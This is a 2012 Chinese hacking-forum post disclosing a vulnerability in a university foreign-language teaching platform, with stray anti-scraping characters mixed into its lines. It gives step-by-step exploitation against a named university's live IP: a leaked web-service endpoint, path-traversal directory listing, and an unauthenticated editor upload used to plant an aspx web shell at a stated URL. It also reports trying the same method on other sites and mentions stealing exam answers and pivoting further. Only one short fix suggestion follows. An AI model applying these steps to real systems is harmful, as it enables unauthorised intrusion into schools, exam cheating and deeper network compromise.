找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2267|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
( W; L) \' w: z4 R* N; j" @7 O) L+ R3 `' K+ w
详细说明:
/ T& u, O% |# t) K5 t3 ` 5 ~, `# z* d2 d5 U* {: b) A: l1 c
以南开大学的为例: 6 }6 f% \# e, U9 \2 n" e; [5 I
http://222.30.60.3/NPELS; k6 D0 B0 a! L& Z$ M4 b
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
# G3 [( R% Q$ ~" a  L7 Y2 y<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 a8 n$ b+ k4 D<value>http://222.30.60.3/NPELS/CommonService.asmx</value>1 D& }) }7 z, r+ \
</setting>- ~3 e1 E& \4 F- h& ~. S" v1 }
及版本号
% r' M3 Q' G/ D+ q3 u2 k* Y+ d<add key="TVersion" value="1, 0, 0, 2187">
# M9 E3 s( a3 \4 S</add>8 l" t% O' \. R- _% W
直接访问0 B+ U& C. n  R+ D
http://222.30.60.3/NPELS/CommonService.asmx; O  N0 ]' N3 y4 F+ }2 O
使用GetTestClientFileList操作,直接 HTTP GET 列目录:5 {; o' ]% F! E6 n) p
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
- y, j( Q6 }5 |" i3 H9 M进一步列目录(返回的网页很大,可以直接 wget 下来)
' o1 p3 l' {' O& K7 D: d$ ?) Z0 fhttp://222.30.60.3/NPELS/CommonS ... List?version=../../& ]5 w  D2 H. z) ^7 d
" ?/ }7 l: [1 Q0 z& }
发现6 y, a1 L- j; k) L9 t# k
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
) ~1 J4 ?4 Y' N, n. G; i" j/ N可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
% `# j! b1 V; s( K上传后继续列目录找到木马地址直接访问即可" F4 |" x+ `# J  E  J* q
; v0 V  q% U- b" U
OOXX
! ~5 O4 c1 C, m$ N8 p 3 k  A3 S' M5 P3 k
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法5 S) n; c' g* Q& s9 T
漏洞证明:8 x$ J' k/ O1 Y/ Y' N, j1 }
! s- o3 q7 E; C8 \
列目录:5 x5 V0 C% M7 i
http://222.30.60.3/NPELS/CommonS ... List?version=../../' K) ?5 X! h8 Y
文件上传:' O) S: o! L' ~
http://222.30.60.3/npelsv/editor/editor.htm9 a. K& J3 h3 w

! z& f4 C0 R/ @# e; ]9 a+ f上传木马:
4 X+ i! V% O0 ?8 D8 j$ ~' u& }http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx% _2 o) E9 e1 I: s+ g9 r
3 Y+ Q0 \( B( j3 t% t) Z9 C
修复方案:6 J0 b; `/ z; L
好像考试系统必须使用 CommonService.asmx4 g/ ~- L( ~* E  ?
最好配置文件加密或者用别的方式不让它泄露出来
+ z% L/ U% \( Z; u  E5 U并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​$ \/ A  G# G3 R5 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表